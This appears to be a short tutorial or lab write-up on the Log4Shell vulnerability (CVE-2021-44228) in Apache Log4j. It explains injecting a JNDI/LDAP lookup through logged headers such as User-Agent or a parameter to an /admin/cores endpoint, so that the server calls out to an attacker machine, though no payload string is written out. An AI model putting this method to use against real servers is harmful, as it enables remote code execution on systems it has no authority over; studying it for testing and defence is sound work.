This article is dedicated to log4j and how it’s being exploited in the wild by attackers.
Apache Log4j, a project of Apache Software Foundation, is a Java-based logging utility. It is written in java and is a package located in the Java logging systems. It is a part of several Java Logging Frameworks.
A 0-day Vulnerability was discovered that affects the Java logging package log4j and has been given a CVE number 2021–44228. It allows attackers to execute code remotely on the web server and has a CVE score of a perfect 10, making it one of the most critical vulnerabilities.
Java is considered the #1 developer platform worldwide and runs on over 3 billion devices. The number of devices running log4j can be regarded as millions, if not billions. This makes it an attractive attack surface to the attackers.
There are different methods to exploit this vulnerability. You can inject the payload in one of the headers that get logged in the server side or pass it as a part of a URL parameter.
Some common Headers are User-Agent or custom headers like X-Forwarded-For, etc.
We have access to the log files for this attack method, which has made it easier for us to exploit this vulnerability.
Looking at the log files, we find that the /admin/cores endpoint expects a parameter. As no parameter was passed previously, the param parameter is empty (i.e., param={})
Now that we have the knowledge, we can supply a payload with a random parameter to the /admin/cores endpoint.
The general payload to abuse log4j 0-day is using JNDI. JNDI, in general, is an API for directory services. You can use LDAP with jndi, to call your attacker machine.